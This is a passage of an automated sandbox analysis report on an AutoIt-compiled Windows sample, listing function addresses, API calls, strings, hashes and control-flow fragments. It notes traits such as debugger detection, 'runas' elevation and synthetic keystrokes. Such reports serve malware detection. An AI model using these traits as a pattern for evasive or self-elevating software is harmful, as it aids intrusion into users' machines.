2453ca2148b malloc 81010->81077 81013 2453ca2fd91 81015 2453ca2fe27 81013->81015 81016 2453ca2fd99 81013->81016 81014 2453ca2fc51 81014->81010 81075 2453ca214b8 malloc 81014->81075 81076 2453ca215d5 malloc 81014->81076 81083 2453ca215c6 malloc 81015->81083 81078 2453ca2149a malloc 81016->81078 81020 2453ca2fdbf 81021 2453ca2fe45 81020->81021 81079 2453ca214b8 malloc 81020->81079 81084 2453ca215c6 malloc 81021->81084 81024 2453ca2fdf7 81024->81021 81025 2453ca2fdfb 81024->81025 81080 2453ca2147c malloc 81025->81080 81027 2453ca2fe09 81081 2453ca2145e malloc 81027->81081 81029->80922 81088 2453ca21394 81030->81088 81032 2453ca2154e 81033 2453ca21394 malloc 81032->81033 81034 2453ca2155d 81033->81034 81035 2453ca21394 malloc 81034->81035 81036 2453ca2156c 81035->81036 81037 2453ca21394 malloc 81036->81037 81038 2453ca2157b 81037->81038 81039 2453ca21394 malloc 81038->81039 81040 2453ca2158a 81039->81040 81041 2453ca21394 malloc 81040->81041 81042 2453ca21599 81041->81042 81043 2453ca21394 malloc 81042->81043 81044 2453ca215a8 81043->81044 81045 2453ca21394 malloc 81044->81045 81046 2453ca215b7 81045->81046 81047 2453ca215c6 81046->81047 81048 2453ca21394 malloc 81046->81048 81049 2453ca21394 malloc 81047->81049 81048->81047 81050 2453ca215d0 81049->81050 81051 2453ca215d5 81050->81051 81052 2453ca21394 malloc 81050->81052 81053 2453ca21394 malloc 81051->81053 81052->81051 81054 2453ca215e4 81053->81054 81055 2453ca21394 malloc 81054->81055 81056 2453ca215f3 81055->81056 81056->80929 81057 2453ca21503 malloc 81056->81057 81057->80931 81058->80934 81059->80932 81060->80968 81061->80972 81062->80978 81063->80975 81064->80977 81065->80982 81066->80987 81067->80989 81068->80991 81069->80993 81070->80995 81071->80997 81072->80999 81073->81004 81074->81014 81075->81014 81076->81014 81077->81013 81078->81020 81079->81024 81080->81027 81081->81000 81082->81000 81083->81000 81084->81000 81085->81003 81086->80969 81087->80929 81091 2453ca30330 81088->81091 81090 2453ca213b8 81090->81032 81092 2453ca3034e 81091->81092 81095 2453ca3037b 81091->81095 81092->81090 81093 2453ca30423 81094 2453ca3043f malloc 81093->81094 81096 2453ca30460 81094->81096 81095->81092 81095->81093 81096->81092

                                                                                                      Executed Functions

                                                                                                      Function 000002453CA21160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2643109117-0
                                                                                                      • Opcode ID: e8f760b2598f29be43354d7eef8e63f86ba430a7196901695baf565450b45d0e
                                                                                                      • Instruction ID: f6c9faa0bf927cee10b5a2cf503dff4c8ea5842be4dd4437f03a7ce028220ce1
                                                                                                      • Opcode Fuzzy Hash: e8f760b2598f29be43354d7eef8e63f86ba430a7196901695baf565450b45d0e
                                                                                                      • Instruction Fuzzy Hash: 61510C37601E7483E653AF55E99C3692BA1B749BC4F4040A6DACA477A7DE3DC8C18740
                                                                                                      Function 000002453CA21394 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: efa557268f1945d94d8dc75b26b63d132cbe65a3d90029b8f465c22dc591ccc4
                                                                                                      • Instruction ID: 391b643ad5526e38102a0b74202b988ca7faebe41b64a0725fc4824063baf467
                                                                                                      • Opcode Fuzzy Hash: efa557268f1945d94d8dc75b26b63d132cbe65a3d90029b8f465c22dc591ccc4
                                                                                                      • Instruction Fuzzy Hash: D5F0A977608F5087D615DF91F96965ABFA0F38A7C0F005859AAC947B26DB3CC190CB40

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF7AA114364 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                      • String ID: Shell_TrayWnd
                                                                                                      • API String ID: 3778422247-2988720461
                                                                                                      • Opcode ID: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                      • Instruction ID: 0db75b9b9bb19da3522621fa826a5b993227a8da442408bc6b3689dbf7a8bd70
                                                                                                      • Opcode Fuzzy Hash: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                      • Instruction Fuzzy Hash: DA418771B0E512E2F7156B25F81863DA2B2BF88B99FD28079C80A47774DE3DA40B4760
                                                                                                      Function 00007FF7AA0F8790 Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 3372153169-0
                                                                                                      • Opcode ID: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                      • Instruction ID: cb88c9b273413dee63a67df042e1f45021f47f4ab6d855fde849b00c5799f137
                                                                                                      • Opcode Fuzzy Hash: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                      • Instruction Fuzzy Hash: 0B22C062E0A643D1FBA6AF24E4502BEA771FB40B94F964175CA1E476B0DE3CE4479330
                                                                                                      Function 00007FF7AA0F2820 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1497 7ff7aa0f2820-7ff7aa0f2871 call 7ff7aa114a6c call 7ff7aa0f1314 1502 7ff7aa13a4fe-7ff7aa13a502 1497->1502 1503 7ff7aa0f2877-7ff7aa0f2889 call 7ff7aa0f1470 1497->1503 1505 7ff7aa13a508-7ff7aa13a50f 1502->1505 1506 7ff7aa0f288d-7ff7aa0f28c6 1502->1506 1503->1506 1510 7ff7aa13a511-7ff7aa13a519 1505->1510 1508 7ff7aa13a52e-7ff7aa13a530 1506->1508 1509 7ff7aa0f28cc-7ff7aa0f28f3 1506->1509 1511 7ff7aa13a53b-7ff7aa13a545 1508->1511 1509->1511 1512 7ff7aa0f28f9-7ff7aa0f291a 1509->1512 1510->1506 1513 7ff7aa13a51f-7ff7aa13a527 1510->1513 1517 7ff7aa13a547-7ff7aa13a549 1511->1517 1518 7ff7aa13a563-7ff7aa13a57f call 7ff7aa0f2794 1511->1518 1514 7ff7aa0f2953-7ff7aa0f2957 1512->1514 1515 7ff7aa0f291c-7ff7aa0f2950 SystemParametersInfoW GetSystemMetrics 1512->1515 1513->1510 1516 7ff7aa13a529 1513->1516 1520 7ff7aa0f29ab-7ff7aa0f2a3e SetRect AdjustWindowRectEx CreateWindowExW 1514->1520 1521 7ff7aa0f2959-7ff7aa0f2993 SystemParametersInfoW GetSystemMetrics 1514->1521 1515->1514 1516->1506 1522 7ff7aa13a620-7ff7aa13a62c call 7ff7aa0f17fc 1517->1522 1523 7ff7aa13a54f-7ff7aa13a55e 1517->1523 1530 7ff7aa13a599-7ff7aa13a5f3 GetWindowRect GetClientRect GetSystemMetrics * 2 1518->1530 1531 7ff7aa13a581-7ff7aa13a592 1518->1531 1528 7ff7aa0f2a44-7ff7aa0f2abf SetWindowLongPtrW GetClientRect GetStockObject SendMessageW call 7ff7aa0f1990 1520->1528 1529 7ff7aa13a60c-7ff7aa13a60e 1520->1529 1521->1520 1527 7ff7aa0f2995-7ff7aa0f29a8 GetSystemMetrics 1521->1527 1524 7ff7aa13a636 1522->1524 1523->1524 1537 7ff7aa13a63d-7ff7aa13a641 1524->1537 1527->1520 1540 7ff7aa0f2ac1-7ff7aa0f2ad6 SetTimer 1528->1540 1541 7ff7aa0f2add-7ff7aa0f2afe call 7ff7aa0f27e8 1528->1541 1529->1522 1532 7ff7aa13a610-7ff7aa13a61e 1529->1532 1530->1512 1536 7ff7aa13a5f9-7ff7aa13a607 GetSystemMetrics 1530->1536 1531->1530 1532->1524 1536->1512 1538 7ff7aa13a62e-7ff7aa13a631 call 7ff7aa19fa30 1537->1538 1539 7ff7aa13a643-7ff7aa13a646 1537->1539 1538->1524 1539->1538 1542 7ff7aa13a648-7ff7aa13a654 call 7ff7aa11428c 1539->1542 1540->1541 1541->1537 1548 7ff7aa0f2b04-7ff7aa0f2b21 1541->1548
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                      • API String ID: 1458621304-248962490
                                                                                                      • Opcode ID: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                      • Instruction ID: fdee9bce36856b79cca440bd822aca32049a8c16320a2e64175d62115935cba9
                                                                                                      • Opcode Fuzzy Hash: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                      • Instruction Fuzzy Hash: 64D19F72A0A642DAF755EF69E8402BD77B0FB48758F820179DA0E536A4DF3CE446C720
                                                                                                      Function 00007FF7AA0F4528 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P
                                                                                                      • API String ID: 0-3110715001
                                                                                                      • Opcode ID: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                      • Instruction ID: b05c3b98ef8c98f47fe2b2a69e16ec9ec8f96aa5f97ca8fd3cefe384dcdb0b66
                                                                                                      • Opcode Fuzzy Hash: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                      • Instruction Fuzzy Hash: 79A1AF72A0A642D6F769EF25E4402AEB770FF84B88F828175DA5E03664CF3DE546C710
                                                                                                      Function 00007FF7AA132290 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                      • String ID: -$:$:$?
                                                                                                      • API String ID: 3440502458-92861585
                                                                                                      • Opcode ID: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                      • Instruction ID: 2ceec1770ac459cab52acd18af5a118f13eebee5cb3b909040f3b622442d3d03
                                                                                                      • Opcode Fuzzy Hash: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                      • Instruction Fuzzy Hash: 03E1D732E0A282E5F76ABF21F8416A9B670AB94784FC54175EA5E426A5CF3CD4438730
                                                                                                      Function 00007FF7AA0F3B64 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3BA6
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3BBB
                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3C35
                                                                                                        • Part of subcall function 00007FF7AA0F2BEC: GetFullPathNameW.KERNEL32(?,00007FF7AA0F3C67,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F2C4D
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3CCC
                                                                                                      • MessageBoxA.USER32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AA96
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AAE3
                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AB6A
                                                                                                      • ShellExecuteW.SHELL32(?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA13AB91
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D06
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D16
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D2B
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D44
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D5D
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: LoadImageW.USER32 ref: 00007FF7AA0F3D89
                                                                                                        • Part of subcall function 00007FF7AA0F3CEC: RegisterClassExW.USER32 ref: 00007FF7AA0F3DED
                                                                                                        • Part of subcall function 00007FF7AA0F3E24: CreateWindowExW.USER32 ref: 00007FF7AA0F3E74
                                                                                                        • Part of subcall function 00007FF7AA0F3E24: CreateWindowExW.USER32 ref: 00007FF7AA0F3EC7
                                                                                                        • Part of subcall function 00007FF7AA0F3E24: ShowWindow.USER32 ref: 00007FF7AA0F3EDD
                                                                                                        • Part of subcall function 00007FF7AA0F477C: Shell_NotifyIconW.SHELL32 ref: 00007FF7AA0F4874
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                      • API String ID: 1593035822-2030392706
                                                                                                      • Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                      • Instruction ID: 31d02aa64f8ebbccca4a800a98a6909e7163d9b256c2621b3702ee981e4f50f5
                                                                                                      • Opcode Fuzzy Hash: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                      • Instruction Fuzzy Hash: 1E61506290E683E6FA62BB20F9800FAE774BF50354FC600B5D54D165B6EE2CE55BC320
                                                                                                      Function 00007FF7AA19AE10 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 312131281-0
                                                                                                      • Opcode ID: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                                                                                                      • Instruction ID: ca503cd69de967b0c7a65256d7ae3205172defec30386fb957641ec4650ca27d
                                                                                                      • Opcode Fuzzy Hash: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                                                                                                      • Instruction Fuzzy Hash: 2271BF36609A81E6E7219F65E880AEDB770FB88B94F864032EA4D43B64CF3CD147C710
                                                                                                      Function 00007FF7AA1324E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: ?
                                                                                                      • API String ID: 500310315-1684325040
                                                                                                      • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                      • Instruction ID: 7f845d0255dca9bd0af0bcdaf48d37a50ee1c2ca416b0ebea807886f38acbf5b
                                                                                                      • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                      • Instruction Fuzzy Hash: B861DD72E0A642E6F7A6BF21F8402A9B7B0AF54784FC60171E95D426A4CF3CE542C770
                                                                                                      Function 00007FF7AA0F24D4 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 381COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F2794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF7AA13A57D), ref: 00007FF7AA0F27B1
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F25EA
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F26F8
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F270D
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA0F2786
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                      • String ID: +
                                                                                                      • API String ID: 3744519093-2126386893
                                                                                                      • Opcode ID: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                      • Instruction ID: 337e555b318ec4289a898fab4860c6f6829b9277fc2e34f4075dec65acd6f23b
                                                                                                      • Opcode Fuzzy Hash: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                                                                                                      • Instruction Fuzzy Hash: 97E1FF32E0E247C6F6757E29A98817EE665AB18BC0FC601B5D84C57BF5DE3DE0428720
                                                                                                      Function 00007FF7AA188CB0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
